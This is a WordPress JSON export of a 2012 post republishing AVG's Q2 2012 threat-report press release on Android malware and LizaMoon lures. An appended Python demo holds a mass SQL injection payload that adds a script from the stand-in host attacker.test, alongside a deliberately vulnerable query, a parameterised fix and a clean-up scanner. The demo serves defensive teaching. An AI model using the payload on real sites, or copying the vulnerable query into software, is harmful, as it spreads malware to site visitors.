{"id":22449,"date":"2012-07-26T20:24:33","date_gmt":"2012-07-26T10:24:33","guid":{"rendered":"http:\/\/power-up.space\/?p=22449"},"modified":"2012-07-26T20:24:33","modified_gmt":"2012-07-26T10:24:33","slug":"cybercriminals-use-social-engineering-to-extend-lifecycle-of-malware-by-ensnaring-tech-savvy-users-with-plausible-scenarios","status":"publish","type":"post","link":"https:\/\/www.impulsegamer.com\/wordpress\/?p=22449","title":{"rendered":"Cybercriminals use social engineering to extend lifecycle of malware by ensnaring tech-savvy users with plausible scenarios"},"content":{"rendered":"<p>AVG (AU\/NZ) Pty Ltd today released AVG Technologies\u2019 Q2 2012 Community Powered Threat Report. This quarter\u2019s report investigates how cybercriminals have combined social engineering with more complex malware authoring for PC and mobile to increase impact, and finds that much of this activity originates in China.<\/p>\n<p>Android smartphone users remain a lucrative target as the platform currently has 59 percent global market share<a title=\"\" href=\"#_ftn1\">[1]<\/a> and is on track to stay the most shipped mobile operating system until 2016<a title=\"\" href=\"#_ftn2\">[2]<\/a>. Much of this new malware has also been identified as originating from China and targeting users there and in neighbouring markets, reflecting the fact that this is now the world\u2019s top smartphone market with over one million mobile web users<a title=\"\" href=\"#_ftn3\">[3]<\/a>.<\/p>\n<p><strong>The China connection<\/strong><\/p>\n<p>This quarter saw the introduction of the first Android bootkit, \u2018DKFbootkit\u2019, which masquerades as a legitimate application and damages the smartphone\u2019s Linux kernel code by replacing it with malicious code. Users are tricked into clicking \u2018OK\u2019 on notifications the malware displays, which lets it add itself to the boot sequence and run every time the device starts. 
Because the attack roots the device, it turns the smartphone into a zombie fully under the cybercriminal\u2019s control, which makes it a serious threat to Android users. It is distributed through third-party application markets in China, not through the official Google Play store.<\/p>\n<p>Malware authors also spammed China, Japan, South Korea, Taiwan and the United States with Trojan-infected email messages about political issues around Tibet. These were released immediately after a Microsoft \u2018Patch Tuesday\u2019 security bulletin<a title=\"\" href=\"#_ftn4\">[4]<\/a>, with the authors exploiting the \u2018window of opportunity\u2019 between the patch release and the time users were actually able to apply it. The email attachment contains an embedded encrypted executable that collects sensitive user information such as passwords and can download additional components, for example a keylogger or a new Trojan configuration.<\/p>\n<p>Michael McKinnon, Security Advisor at AVG (AU\/NZ), said: \u201cIn AVG\u2019s experience, an operating system attracts attention from cybercriminals once it secures five percent market share; once it reaches ten percent, it will be actively attacked. It\u2019s no surprise therefore that our investigations uncovered a further upsurge in malware targeting Android smartphones given its sustained popularity, with new attacks focused on rooting the devices to give cybercriminals full control. What\u2019s new this quarter is the significant upsurge in these threats originating from China.\u201d<\/p>\n<p><strong>The end of antivirus?<\/strong><\/p>\n<p>For all the sensationalism around the discovery of Stuxnet in 2010 and of Flame in 2012, the average consumer was never actually a target of either. 
While both were widely reported as cyber-weapons, Flame was not a patch on Stuxnet in terms of malware authoring; in particular, the techniques used in its payload were not very impressive. The security industry has already adapted to the unpredictable nature of such threats, with traditional signature detection being just one layer of a multi-layered security solution.<\/p>\n<p><strong>Consumer scams<\/strong><\/p>\n<p>This quarter\u2019s version of the LizaMoon mass SQL injection attack tricks users into downloading a Trojan or rogue software by exploiting human curiosity, using lures such as non-existent celebrity sex videos and fake antivirus warnings. The attack injects malicious code into legitimate but vulnerable websites and then uses a different lure for Mozilla\u2019s Firefox and for Microsoft\u2019s Internet Explorer. In Firefox, users are lured with supposed raunchy videos of socialite Paris Hilton and actress Emma Watson and told to update their Flash installation in order to view them. Users never get to see the video: what is installed is a Trojan disguised as a Flash update.<\/p>\n<p>In Internet Explorer, users receive a prompt that appears to come from an antivirus website and claims to have found malware on their computer. They are encouraged to download the rogue program and, once it is installed, to \u2018purchase\u2019 it; paying simply removes the fake warnings. Should the victim decide not to pay, nag screens keep popping up until the rogue is cleaned from the machine. 
In the most recent version, the malware was updated to use \u2018drive-by downloads\u2019: victims need only visit the website to become infected, and closing the web page is no longer enough to stay safe.<\/p>\n<p>Rovio\u2019s \u2018<a href=\"http:\/\/email.erelease.com.au\/wf\/click?upn=ltWDM3d6Z2diEs-2BXXRbDYMNuoiGMN8Hkp81qcftQqWtPGRybmghVFV6iNVtGubjT8Kx806wqz1ie3S1jHuMp2w-3D-3D_diS2Z65q3OkoKPsjgGp5n15COmhoq7XsjxZNaFg66QoyPJ7LRpa528y3h17TgQWrQyy8pFDNGSZg98bdRaned0UJyV-2Fmy574dKu7g4n2ltDjLo5Z-2FOWn-2FMAKgU9B6MmEy028hkuIBZaSK9Ib281OkvTOHo-2BfA3E8x16GK4Hoiztg-2FlQZNoc2ZJh7lBYgFr1OjKZHVTP6MZTkQt9lUx2y6Yp-2BPx2ruZE072i71y-2FOEjQ-3D\">Angry Birds Space\u2019<\/a> application was also on the front line of consumer scams this quarter. A fully functional, Trojan-infected copy using the same graphics as the legitimate version was uploaded to unofficial Android application stores. It uses the GingerBreak exploit to root the device and then contacts a remote command-and-control server, from which it can download and install additional malware, enrol the device in a botnet, modify files and launch URLs.<\/p>\n<p>To download the full Q2 2012 Community Powered Threat Report, please visit: <a href=\"http:\/\/email.erelease.com.au\/wf\/click?upn=0a8tMEZqIEUfa6Swg2queC9BaKR4Nuuzt-2FREzXgOnyoVhzNdjb6Y-2BJUhodI-2FT3DRPFpyq6gBEWeE30P5AsNXwYL-2F4LT6efSFYsDgn7K95NmzJm7eBfv4cIvdpBOXKn9GWMTQskChvKoKNt-2B3W-2F6twwAO0FR0bwUng3pmYDssZN0-3D_diS2Z65q3OkoKPsjgGp5n15COmhoq7XsjxZNaFg66QoyPJ7LRpa528y3h17TgQWrQyy8pFDNGSZg98bdRaned47E08Ike1zUZ87oZFSEaD8-2FV2ZrKpkiFwkYXcsRThCBUqtH5U7jR3t-2B4MIhZ8Fxts3gLT4RK7uCotpO1sX5qmFYx3vGDoPzamDFTY3cy5IzlVnQ68Kz0CQQ6CnmhBZ9zjiVdzE29h9AEGniwRGUDx8-3D\">http:\/\/mediacenter.avg.com\/en\/press-tools\/avg-threat-reports\/avg-community-powered-threat-report-q2-2012.html<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>AVG (AU\/NZ) Pty Ltd today released AVG Technologies\u2019 Q2 2012 Community Powered Threat Report. 
This quarter\u2019s report investigates how cybercriminals have combined social engineering with more complex malware authoring for PC and mobile to increase impact, and that many of these are emerging from China. Android smartphone users remain a lucrative target as the platform<\/p>\n<p class=\"more-link\"><a href=\"https:\/\/www.impulsegamer.com\/wordpress\/?p=22449\">Read More\u2026<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-22449","post","type-post","status-publish","format-standard","hentry","category-game-news"],"_links":{"self":[{"href":"https:\/\/www.impulsegamer.com\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/22449","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.impulsegamer.com\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.impulsegamer.com\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.impulsegamer.com\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.impulsegamer.com\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22449"}],"version-history":[{"count":1,"href":"https:\/\/www.impulsegamer.com\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/22449\/revisions"}],"predecessor-version":[{"id":22452,"href":"https:\/\/www.impulsegamer.com\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/22449\/revisions\/22452"}],"wp:attachment":[{"href":"https:\/\/www.impulsegamer.com\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22449"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.impulsegamer.com\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22449"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.impulsegamer.com\/wordpre
ss\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22449"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
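The "Consumer scams" section describes LizaMoon only at the level of "injecting malicious code into legitimate but vulnerable websites". The following is an added example, not code from the report or from AVG, showing the query shape that lets a mass-injection bot append a script tag to every stored page, the parameterised fix, and the scan a site owner would run afterwards to find and strip externally hosted script tags. The CMS table, its rows and the hostnames (attacker.test, cdn.example-site.test) are constructed for the demo and are not taken from the report.

```python
"""Mass SQL injection of the LizaMoon kind: vulnerable query, parameterised fix,
and a clean-up scan. Sample data and hostnames are constructed for this demo."""
import re
import sqlite3

# Constructed sample CMS content (id, title, body, views); not from the report.
SAMPLE_ROWS = [
    (1, "Welcome", "<p>Welcome to our site.</p>", 0),
    (2, "News", "<p>Latest news.</p>", 0),
]

# Hypothetical hosts: the site's own CDN is allowed, the attacker's is not.
ALLOWED_SCRIPT_HOSTS = {"cdn.example-site.test"}
INJECTED_TAG = '<script src="http://attacker.test/inject.js"></script>'

# What a mass-injection bot sends where the site expects a numeric page id: a
# stacked statement that appends the tag to the body column of every row.
MASS_INJECTION_PAYLOAD = "1; UPDATE pages SET body = body || '" + INJECTED_TAG + "'"

# Matches <script src="//host/..."></script> and captures the host.
SCRIPT_SRC_RE = re.compile(
    r"""<script[^>]*\ssrc\s*=\s*["']?(?:https?:)?//([^/"'\s>]+)[^>]*>\s*</script>""",
    re.IGNORECASE,
)


def fresh_db():
    """In-memory table standing in for a CMS database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT, views INTEGER)"
    )
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def vulnerable_count_view(conn, page_id):
    """Concatenates user input into SQL and runs it with executescript(), which
    executes stacked statements the way the vulnerable sites hit by mass-injection
    bots did. Shown only to demonstrate the flaw."""
    conn.executescript("UPDATE pages SET views = views + 1 WHERE id = " + page_id + ";")


def safe_count_view(conn, page_id):
    """Parameterised version: the whole input is bound as a single value, so it can
    never become SQL. Returns the number of rows updated (0 for the payload)."""
    cur = conn.execute("UPDATE pages SET views = views + 1 WHERE id = ?", (page_id,))
    conn.commit()
    return cur.rowcount


def find_injected_scripts(conn, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Scan text columns for <script src> tags pointing at hosts not on the
    allow-list. Returns (row id, column, host) triples."""
    hits = []
    for row_id, title, body in conn.execute("SELECT id, title, body FROM pages"):
        for column, text in (("title", title), ("body", body)):
            for host in SCRIPT_SRC_RE.findall(text or ""):
                if host.lower() not in allowed_hosts:
                    hits.append((row_id, column, host.lower()))
    return hits


def strip_injected_scripts(conn, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Remove foreign script tags from body with a parameterised UPDATE.
    Returns the number of rows cleaned."""
    def keep_or_drop(match):
        return match.group(0) if match.group(1).lower() in allowed_hosts else ""

    cleaned = 0
    for row_id, body in list(conn.execute("SELECT id, body FROM pages")):
        new_body = SCRIPT_SRC_RE.sub(keep_or_drop, body or "")
        if new_body != body:
            conn.execute("UPDATE pages SET body = ? WHERE id = ?", (new_body, row_id))
            cleaned += 1
    conn.commit()
    return cleaned


def demo():
    """Inject through the vulnerable path, show the safe path rejects the payload,
    then detect and clean. Returns (hits before, rows the safe path updated,
    rows cleaned, hits after)."""
    conn = fresh_db()
    vulnerable_count_view(conn, MASS_INJECTION_PAYLOAD)  # every body now carries the tag
    before = find_injected_scripts(conn)
    untouched = safe_count_view(fresh_db(), MASS_INJECTION_PAYLOAD)  # bound as text: 0 rows
    cleaned = strip_injected_scripts(conn)
    after = find_injected_scripts(conn)
    return before, untouched, cleaned, after


if __name__ == "__main__":
    print(demo())
```

The scan keys on the script host rather than on a specific filename, because a campaign of this kind rotates domains; an allow-list of the hosts your own pages legitimately load from is the stable signal.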